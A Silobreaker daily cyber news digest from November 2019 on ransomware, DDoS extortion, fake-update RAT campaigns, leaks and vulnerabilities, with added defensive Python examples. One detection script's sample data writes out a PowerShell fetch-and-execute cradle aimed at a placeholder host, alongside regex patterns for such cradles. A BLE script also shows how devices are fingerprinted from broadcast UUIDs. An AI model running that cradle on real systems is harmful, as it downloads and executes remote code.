Silobreaker Daily Cyber Digest – 18 November 2019
NextCloud Linux servers hit with new NextCry ransomware
- BleepingComputer and security researcher Michael Gillespie analysed newly spotted ransomware, named NextCry, which targets clients of the NextCloud file sync and share service. The malware is ‘a Python script compiled in a Linux ELF binary using pyInstaller’ and Base64-encodes the names of the files it encrypts.
- Gillespie found that the ransomware encrypts data with AES using a 256-bit key. The malware also embeds an RSA-2048 public key, which is used to encrypt the AES-256 key, so encrypted files cannot be recovered without the attackers’ private key.
- At the time of analysis NextCry was not detected by any antivirus engine on VirusTotal, and no decryptor is currently available.
Source (Includes IOCs)
Threat actors pose as Cozy Bear group
- Akamai researchers observed threat actors running distributed denial-of-service (DDoS) extortion campaigns while claiming to be the Russian group Cozy Bear, also known as APT29. Cozy Bear is known for targeting commercial entities and government organisations with customised malware. As the group has not previously been observed running extortion campaigns, the researchers believe the threat actors are using its name ‘to invoke fear and panic.’
- The campaign involves extortion letters sent to targeted companies demanding 2 Bitcoin (about $17,500), a price that rises if the deadline is missed, at which point the DDoS attacks begin. The researchers believe a unique wallet is used for each victim.
- As in a previous campaign by a group pretending to be Fancy Bear, the threat actors run ‘small attacks’ lasting about 30 minutes as proof of their capabilities. The attacks observed by the researchers were UDP reflection attacks abusing DNS, Apple Remote Management Service (ARMS), CLDAP, TFTP, Portmap and WS-Discovery.
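The six services named above are all UDP reflection vectors, so the ‘demo’ attack has a recognisable shape in flow data: traffic arriving from a well-known source port (53, 3283, 389, 69, 111, 3702), from many distinct reflector addresses, aimed at one victim, in large amplified packets. The script below is an added example (not code from Akamai or from the digest) that groups NetFlow-style records by victim and source port to name the vectors in use; the record layout, the thresholds and the sample flows are constructed assumptions.

```python
"""Spot UDP reflection/amplification vectors in NetFlow-style records.

Added example: reflected traffic arrives from a well-known *source* port (the
abused service) and from many distinct reflector IPs, all aimed at one victim,
with large, amplified packets.  Grouping inbound UDP flows by (victim, source
port) makes each vector in use stand out.  The record layout, thresholds and
sample flows below are constructed assumptions, not data from the report.
"""
from collections import defaultdict
from typing import NamedTuple

# UDP services commonly abused as reflectors, keyed by the source port the
# reflected traffic arrives from.
REFLECTION_PORTS = {
    53: "DNS",
    69: "TFTP",
    111: "Portmap",
    389: "CLDAP",
    3283: "ARMS",
    3702: "WS-Discovery",
}

class Flow(NamedTuple):
    src: str
    sport: int
    dst: str
    dport: int
    proto: str
    packets: int
    octets: int

# Constructed sample: five DNS reflectors and four CLDAP reflectors hitting
# 203.0.113.10, two WS-Discovery sources (below threshold), one ordinary DNS
# reply to another host, and one TCP flow that must be ignored.
SAMPLE_FLOWS = """\
198.51.100.1 53 203.0.113.10 40001 UDP 1000 1200000
198.51.100.2 53 203.0.113.10 40001 UDP 1000 1200000
198.51.100.3 53 203.0.113.10 40001 UDP 1000 1200000
198.51.100.4 53 203.0.113.10 40001 UDP 1000 1200000
198.51.100.5 53 203.0.113.10 40001 UDP 1000 1200000
198.51.100.20 389 203.0.113.10 40001 UDP 500 1500000
198.51.100.21 389 203.0.113.10 40001 UDP 500 1500000
198.51.100.22 389 203.0.113.10 40001 UDP 500 1500000
198.51.100.23 389 203.0.113.10 40001 UDP 500 1500000
198.51.100.30 3702 203.0.113.10 40001 UDP 300 900000
198.51.100.31 3702 203.0.113.10 40001 UDP 300 900000
198.51.100.53 53 203.0.113.20 51234 UDP 10 1200
198.51.100.40 389 203.0.113.10 44000 TCP 20 6000
"""

def parse_flows(text):
    """Parse 'src sport dst dport proto packets octets' lines into Flow records."""
    flows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        src, sport, dst, dport, proto, pkts, octs = line.split()
        flows.append(Flow(src, int(sport), dst, int(dport), proto, int(pkts), int(octs)))
    return flows

def detect_reflection(flows, min_reflectors=3, min_avg_pkt=400):
    """Return {(victim, vector): stats} for inbound UDP traffic that looks reflected.

    Criteria: UDP, source port is a known reflection service, at least
    `min_reflectors` distinct source IPs hitting the same victim from that port,
    and a large average packet size (amplified responses, not client requests).
    """
    groups = defaultdict(lambda: {"reflectors": set(), "packets": 0, "octets": 0})
    for f in flows:
        if f.proto != "UDP" or f.sport not in REFLECTION_PORTS:
            continue
        g = groups[(f.dst, REFLECTION_PORTS[f.sport])]
        g["reflectors"].add(f.src)
        g["packets"] += f.packets
        g["octets"] += f.octets
    findings = {}
    for key, g in groups.items():
        avg = g["octets"] / g["packets"] if g["packets"] else 0
        if len(g["reflectors"]) >= min_reflectors and avg >= min_avg_pkt:
            findings[key] = {"reflectors": len(g["reflectors"]),
                             "avg_pkt_bytes": round(avg), "octets": g["octets"]}
    return findings

def report(text=SAMPLE_FLOWS):
    return detect_reflection(parse_flows(text))

if __name__ == "__main__":
    for (victim, vector), stats in sorted(report().items()):
        print(f"{victim} <- {vector}: {stats}")
```

The single DNS reply to 203.0.113.20 and the two WS-Discovery sources fall below the reflector-count threshold and are not reported, which is the point of counting distinct sources rather than bytes alone: one busy resolver is not an attack. Tune `min_reflectors` and `min_avg_pkt` to the baseline of the network being monitored.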
NetSupport RAT spread via two malware campaigns
- Zscaler ThreatLabZ researchers observed two separate malware campaigns spreading the commercially available NetSupport RAT through fake update notices injected into compromised content management system (CMS) sites. Once installed, NetSupport RAT sends the victim’s system information to the attackers’ server, giving them remote access to the compromised device.
- The first campaign injects two malicious redirect scripts into a compromised WordPress site, which redirect the user to the malware site and load a fake Flash Player update template. Whichever button the user clicks on the fake update, ‘Update’ or ‘Later,’ a malicious HTA file is downloaded; when executed it runs PowerShell, which downloads the payload. At least 113,000 unique users have been targeted.
- In the second campaign the attackers inject the fake update template script directly into a compromised legitimate site. This time a fake font update is used, with templates tailored to the victim’s browser.
Source (Includes IOCs)
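The chain described above, browser to mshta.exe running a downloaded .hta to powershell.exe fetching the payload, is easy to catch in process-creation telemetry regardless of which fake update template was used. The following is an added example (not Zscaler’s code) that walks constructed Sysmon-style events and flags PowerShell spawned by a script host, download-cradle command lines, and HTAs launched from user-writable paths; the event layout, file names and URL are assumptions, not indicators from the campaign.

```python
"""Catch the NetSupport fake-update chain in process-creation telemetry.

Added example: the infection path is browser -> mshta.exe running a downloaded
.hta -> powershell.exe fetching the payload.  The events below are constructed
Sysmon-style records (pid, ppid, image, command line); real telemetry needs a
field-name mapping.  None of the paths or URLs are indicators from the campaign.
"""
import ntpath
import re

# Script hosts that rarely have a legitimate reason to launch PowerShell.
LOLBIN_PARENTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Typical PowerShell download-cradle and encoded-command markers.
DOWNLOAD_CRADLE = re.compile(
    r"DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient|-enc(odedcommand)?\b",
    re.IGNORECASE,
)
# Locations a browser or user can write to; a vendor HTA under Program Files is not flagged.
USER_WRITABLE = re.compile(r"\\(Downloads|AppData|Temp|Public)\\", re.IGNORECASE)

# Constructed sample events (hypothetical host, user and URL).
EVENTS = [
    {"pid": 100, "ppid": 1, "image": r"C:\Windows\explorer.exe", "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "cmd": "chrome.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r'mshta.exe "C:\Users\alice\Downloads\flashupdate.hta"'},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
            ".DownloadString('http://example.invalid/p.txt')\""},
    # Benign: an admin running PowerShell from Explorer, and a vendor HTA under Program Files.
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe Get-Process"},
    {"pid": 600, "ppid": 100, "image": r"C:\Windows\System32\mshta.exe",
     "cmd": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]

def basename(path):
    return ntpath.basename(path).lower()

def process_chain(by_pid, pid):
    """Walk ppid links upwards and render 'root > ... > leaf'."""
    names, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        names.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return " > ".join(reversed(names))

def detect(events):
    """Return one finding per suspicious process: pid, ancestry chain, reasons."""
    by_pid = {e["pid"]: e for e in events}
    findings = []
    for e in events:
        name = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_name = basename(parent["image"]) if parent else ""
        reasons = []
        if name == "powershell.exe" and parent_name in LOLBIN_PARENTS:
            reasons.append(f"powershell spawned by {parent_name}")
        if name == "powershell.exe" and DOWNLOAD_CRADLE.search(e["cmd"]):
            reasons.append("download cradle in command line")
        if (name == "mshta.exe" and re.search(r"\.hta\b", e["cmd"], re.I)
                and USER_WRITABLE.search(e["cmd"])):
            reasons.append("HTA run from user-writable path")
        if reasons:
            findings.append({"pid": e["pid"], "chain": process_chain(by_pid, e["pid"]),
                             "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in detect(EVENTS):
        print(f["pid"], f["chain"], "|", "; ".join(f["reasons"]))
```

The parent-child rule on its own is the most robust of the three: the fake-update lure can change, and command lines can be obfuscated, but mshta.exe spawning powershell.exe is abnormal on almost any fleet and is cheap to alert on.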
Hacktivist offers bug bounty to other hackers
- Hacktivist Phineas Fisher is offering up to $100,000 in cryptocurrency to other hackers as part of a ‘Hacktivist Bug Hunting Program’ aimed at ‘hacktivists who do public interest hacks.’ Examples of targets given by Phineas Fisher are mining and livestock companies in South America, Israel’s NSO Group, and the oil company Halliburton.
- Phineas Fisher is known for hacking multiple organisations, including the British-German Gamma Group, maker of the FinFisher spyware, the Italian company HackingTeam, a Spanish police union, Turkey’s ruling party in 2016, and several banks. The money for the bounty is said to come from a more recent, as yet undisclosed, hack.
Leaks and Breaches
Disney+ accounts hijacked and sold hours after the service launched
- ZDNet reported that Disney+ user accounts were being sold or given away on hacking forums within hours of the service’s launch, at prices from $3 to $11.
- ZDNet spoke to affected customers; some admitted to reusing passwords, while others said they had used fresh passwords, which suggests their devices were infected with info-stealing or keylogging malware.
Unsecured database exposes Wizards of the Coast customer data
- Researchers at Fidus Information Security discovered an Amazon Web Services database belonging to Wizards of the Coast, the company behind the trading card game Magic: The Gathering. The database had been publicly accessible without password protection since approximately early September 2019 and has since been secured.
- The database exposed the names, email addresses and passwords of 452,634 players of Magic: The Gathering Arena and Magic: The Gathering Online, along with 470 email addresses belonging to company employees. According to TechCrunch, none of the data was encrypted and some accounts dated back to at least 2012. A company spokesperson said the files came from a decommissioned website.
146 vulnerabilities found in pre-installed Android apps and firmware
- Kryptowire researchers found 146 vulnerabilities in pre-installed firmware and apps from 29 Android vendors. They include 41 system property modification flaws, 30 command execution vulnerabilities and 24 app installation bugs, as well as flaws allowing wireless setting modification, audio recording, dynamic code loading and AT command execution.
- A detailed list of all vulnerabilities and affected products can be accessed on Kryptowire’s website.
Home Office’s Brexit app lacks basic protections
- Security researchers at Promon reported that the Home Office’s EU Exit: ID Document Check app for Android lacks basic resilience against easily performed attacks and commonly used tools. The app, which has been downloaded over 1 million times, requires users to submit a range of sensitive information.
- The researchers state that the app allows code to be injected while it is running, does not detect that it is being used in a hostile environment, does not use code obfuscation, and more. An attacker could exploit these weaknesses to acquire sensitive information such as passport details, facial scans and photo ID.
WhatsApp patches vulnerability that could have allowed installation of spyware
- WhatsApp has patched a vulnerability, tracked as CVE-2019-11931, affecting the consumer and enterprise versions of the messaging app on all major platforms. The flaw, a stack-based buffer overflow, could be triggered by sending a maliciously crafted MP4 file over WhatsApp, leading to denial of service or remote code execution.
- An attacker could use it to install a backdoor or spyware on the compromised device, potentially stealing chat messages and files.
- WhatsApp told The Hacker News that there is no evidence the vulnerability was exploited in the wild.
Bluetooth device flaw allows attackers to collect user data
- Researchers at The Ohio State University found that Bluetooth Low Energy (BLE) devices contain a design flaw that leaves them vulnerable both when pairing with a mobile app and while operating. The researchers scanned the Google Play Store and identified 18,166 BLE apps.
- The flaw concerns the universally unique identifiers (UUIDs) that devices commonly broadcast in the clear when connecting to their mobile app. Because the same UUIDs can be recovered from the companion app, an attacker who sniffs advertisements can fingerprint the device and the app it belongs to.
- In some cases the researchers found they could ‘listen in’ and collect data; this occurred when no encryption was used or when encryption was used improperly. The researchers believe the issue is easily resolved and have passed a list of recommendations to the Bluetooth Special Interest Group.
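To see why broadcast UUIDs fingerprint a device, it helps to look at what is actually on the air. A BLE advertisement is a sequence of AD structures, each a length byte, a type byte and a payload; service UUIDs are carried in types 0x02/0x03 (16-bit) and 0x06/0x07 (128-bit). The script below is an added example (not the researchers’ code) that builds a constructed 30-byte advertisement, parses it back into UUIDs, flags and name, and matches the UUIDs against a small catalog of the kind an attacker would assemble by extracting UUIDs from companion apps. 0x180D is the Bluetooth SIG Heart Rate service; the 128-bit vendor UUID, device name and catalog labels are invented for the example.

```python
"""Parse BLE advertising data and fingerprint the device from its UUIDs.

Added example: advertising data is a run of AD structures (len, type, payload).
We build a constructed advertisement, parse it, and look the advertised UUIDs
up in a catalog of UUID -> app/product.  0x180D is the SIG-assigned Heart Rate
service; the 128-bit UUID, name and catalog labels are invented.
"""
import struct
import uuid

AD_FLAGS, AD_NAME_SHORT, AD_NAME_COMPLETE, AD_SERVICE_DATA16 = 0x01, 0x08, 0x09, 0x16
AD_TYPES_16 = {0x02, 0x03, 0x14}    # incomplete/complete 16-bit UUID lists, solicitation
AD_TYPES_128 = {0x06, 0x07, 0x15}   # incomplete/complete 128-bit UUID lists, solicitation

def ad_struct(ad_type, payload):
    """Encode one AD structure: length (type + payload), type, payload."""
    return bytes([len(payload) + 1, ad_type]) + payload

VENDOR_UUID = uuid.UUID("12345678-1234-5678-1234-56789abcdef0")  # constructed, not a real vendor
SAMPLE_ADV = (
    ad_struct(AD_FLAGS, b"\x06")                        # LE General Discoverable, no BR/EDR
    + ad_struct(0x03, struct.pack("<H", 0x180D))         # complete 16-bit list: Heart Rate
    + ad_struct(0x07, VENDOR_UUID.bytes[::-1])           # complete 128-bit list, little-endian
    + ad_struct(AD_NAME_COMPLETE, b"FB7")                # complete local name (constructed)
)   # 30 bytes, within the 31-byte legacy advertising limit

def parse_adv(data):
    """Walk the AD structures and collect flags, UUIDs, name and service data."""
    out = {"flags": None, "uuids": [], "name": None, "service_data": {}}
    i = 0
    while i < len(data):
        length = data[i]
        if length == 0:                 # zero length terminates the data per the spec
            break
        if i + 1 + length > len(data):
            raise ValueError(f"truncated AD structure at offset {i}")
        ad_type = data[i + 1]
        payload = data[i + 2 : i + 1 + length]
        if ad_type == AD_FLAGS and payload:
            out["flags"] = payload[0]
        elif ad_type in AD_TYPES_16:
            for (u,) in struct.iter_unpack("<H", payload[: len(payload) // 2 * 2]):
                out["uuids"].append(f"{u:04x}")
        elif ad_type in AD_TYPES_128:
            for off in range(0, len(payload) - 15, 16):
                # BLE sends 128-bit UUIDs little-endian; reverse to get the canonical form.
                out["uuids"].append(str(uuid.UUID(bytes=payload[off : off + 16][::-1])))
        elif ad_type in (AD_NAME_SHORT, AD_NAME_COMPLETE):
            out["name"] = payload.decode("utf-8", "replace")
        elif ad_type == AD_SERVICE_DATA16 and len(payload) >= 2:
            svc = struct.unpack("<H", payload[:2])[0]
            out["service_data"][f"{svc:04x}"] = payload[2:]
        i += 1 + length
    return out

# Constructed catalog of the kind an attacker builds by pulling UUID constants
# out of BLE companion apps.  Keys are canonical lowercase UUID strings.
UUID_CATALOG = {
    "180d": "any heart-rate monitor (Bluetooth SIG assigned 0x180D)",
    "12345678-1234-5678-1234-56789abcdef0": "Example Fitness companion app (constructed)",
}

def fingerprint(parsed, catalog=UUID_CATALOG):
    """Return the catalog labels matching the advertised UUIDs."""
    return sorted({catalog[u] for u in parsed["uuids"] if u in catalog})

if __name__ == "__main__":
    parsed = parse_adv(SAMPLE_ADV)
    print(parsed)
    print(fingerprint(parsed))
```

Nothing in this exchange is encrypted or authenticated: advertising happens before any pairing, so the UUIDs are visible to any receiver in range. The recommendations passed to the Bluetooth SIG aim at exactly this gap, for instance by not advertising app-specific UUIDs until a trusted connection exists.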
Malicious lookalike retail domains have more than doubled since 2018
- Researchers at Venafi identified over 100,000 lookalike domains targeting the customers of 20 major retailers in the US, UK, France, Germany and Australia.
- The attackers, primarily after financial information, used valid TLS certificates, so the sites show as secure in the browser; sixty percent of the malicious domains used free certificates from Let’s Encrypt. A full breakdown by country is available on Venafi’s blog.
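Since a valid certificate says nothing about intent, defenders have to find lookalikes by the name itself. The script below is an added example (not Venafi’s tooling) that triages observed domain names against a brand list: it decodes punycode, strips accents and common digit-for-letter homoglyphs, then classifies each name as a homoglyph, typosquat (edit distance with transpositions), combosquat (brand plus extra words) or TLD swap. The brands, legitimate TLDs, public-suffix table and observed domains are constructed assumptions; a real deployment would use the Public Suffix List and feed in newly issued certificates from Certificate Transparency logs.

```python
"""Classify observed domains as lookalikes of a set of brands.

Added example: normalises each registrable label (punycode, accents, digit
homoglyphs) and compares it to each brand with an optimal-string-alignment
edit distance.  The brands, legitimate TLDs, public-suffix table and observed
domains are constructed assumptions.
"""
import unicodedata

# Tiny stand-in for the Public Suffix List (assumption).
PUBLIC_SUFFIXES = {"co.uk", "com.au"}
# Brand -> TLDs it legitimately uses (constructed).
BRANDS = {"examplemart": {"com"}, "shopzone": {"co.uk"}}
# Digit/letter-pair substitutions seen in squatting.  Brand names are normalised
# with the same table, so a brand containing "rn" still compares equal to itself.
HOMOGLYPHS = [("rn", "m"), ("vv", "w"), ("0", "o"), ("1", "l"), ("3", "e"), ("5", "s"), ("7", "t")]

def normalize(label):
    label = label.lower()
    label = "".join(c for c in unicodedata.normalize("NFKD", label) if not unicodedata.combining(c))
    for glyph, plain in HOMOGLYPHS:
        label = label.replace(glyph, plain)
    return label

def split_domain(domain):
    """Return (registrable label, public suffix), decoding IDNA labels first."""
    domain = domain.lower().rstrip(".")
    if "xn--" in domain:
        domain = domain.encode("ascii").decode("idna")
    parts = domain.split(".")
    suffix_len = 2 if ".".join(parts[-2:]) in PUBLIC_SUFFIXES else 1
    return parts[-suffix_len - 1], ".".join(parts[-suffix_len:])

def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]

def classify(domain, brands=BRANDS):
    """Return (brand, verdict) for one domain."""
    raw_label, tld = split_domain(domain)
    label = normalize(raw_label)
    for brand, legit_tlds in brands.items():
        b = normalize(brand)
        if label == b:
            if raw_label == brand and tld in legit_tlds:
                return brand, "legitimate"
            if raw_label != brand:
                return brand, "homoglyph"
            return brand, "tld-swap"
        if b in label:
            return brand, "combosquat"
        if osa_distance(label, b) <= (1 if len(b) < 8 else 2):
            return brand, "typosquat"
    return None, "unrelated"

# Constructed observations, e.g. names seen in new-certificate feeds.
OBSERVED = [
    "examplemart.com", "www.examplemart.com", "examp1emart.com", "exampelmart.com",
    "examplemart-login.com", "examplemart.net",
    "exämplemart.com".encode("idna").decode("ascii"),   # punycode form of an accented lookalike
    "shopzone-secure.co.uk", "sh0pzone.com", "totallydifferent.com",
]

def triage(domains=OBSERVED, brands=BRANDS):
    return {d: classify(d, brands) for d in domains}

if __name__ == "__main__":
    for domain, (brand, verdict) in triage().items():
        print(f"{domain:32} {verdict:12} {brand or ''}")
```

Each verdict maps to a different response: homoglyphs and typosquats are candidates for takedown or a pre-emptive block, combosquats such as brand-login are the ones most likely to be phishing pages worth a closer look, and a TLD swap of the exact brand is usually a defensive registration the brand owner should hold itself.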
China-based Tianfu Cup competition sees hackers exploit Edge, Chrome, Safari and more
- The Tianfu Cup (TFC), the Chinese equivalent of Pwn2Own, saw Chinese security researchers successfully exploit Microsoft Edge, Google Chrome, Office 365, Safari, Adobe PDF Reader and more.
- The Tianfu Cup was established after the Chinese government barred Chinese security researchers from competing in international hacking events.
The Silobreaker Team
Although Silobreaker has relied on what it regards as reliable sources while compiling the content herein, Silobreaker cannot guarantee the accuracy, completeness, integrity or quality of such content and no responsibility is accepted by Silobreaker in respect of such content. Readers must determine for themselves what reliance they should place on the compiled content herein.